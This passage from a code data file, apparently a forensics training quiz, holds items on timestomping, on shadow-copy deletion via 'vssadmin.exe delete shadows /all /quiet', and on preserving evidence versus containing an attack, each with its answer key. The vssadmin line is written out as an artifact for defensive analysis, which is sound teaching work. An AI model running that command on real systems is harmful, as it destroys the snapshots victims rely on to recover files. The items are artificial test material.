        explanation: "Tools write $STANDARD_INFORMATION easily but rarely touch $FILE_NAME, so a large disagreement between the two is the standard timestomping signal. Option 1 does not explain why only one attribute set is old. Option 2 would skew both sets in the same direction. Option 4 is a real cause of timestamp differences, but a copy does not produce a date predating the operating system.",
        xp: 20,
      },
      {
        id: "dfe_10",
        question: "Command history shows: vssadmin.exe delete shadows /all /quiet. What is the forensic impact?",
        options: [
          "Event logs are wiped, so no prior activity on the host can be recovered",
          "The MFT is rebuilt, meaning file creation times can no longer be trusted",
          "Registry hives are reset, so persistence keys will read as clean now",
          "Prior file versions are gone, cutting off a route to pre-attack copies",
        ],
        answer: 3,
        explanation: "Shadow copies hold point-in-time snapshots that let you recover files as they were before the intrusion, and destroying them is standard practice before ransomware encrypts. Option 1 is wrong — that is what Event 1102 covers. Option 2 is wrong because vssadmin does not touch the MFT. Option 3 is wrong: live registry hives are unaffected, only their snapshot copies are lost.",
        xp: 15,
      },
      {
        id: "dfe_11",
        question: "An attacker is actively exfiltrating from a server that is also your best source of evidence. How do you handle the tension between preserving and containing?",
        options: [
          "Contain first and accept the loss, since stopping harm always outweighs it",
          "Preserve fully first, because an incomplete investigation helps nobody",
          "Capture volatile evidence, then contain — and record what you traded away",
          "Isolate the network segment only, and leave the host untouched for imaging",
        ],
        answer: 2,
        explanation: "A memory capture takes minutes and preserves what containment destroys, so the practical answer is a fast acquisition followed by containment, with the decision documented. Option 1 discards recoverable evidence for no time saved. Option 2 lets exfiltration continue while you image a disk. Option 4 sounds cautious but leaves the attacker's code running and the volatile evidence still unacquired.",
        xp: 20,
      },
    ],
  },
];
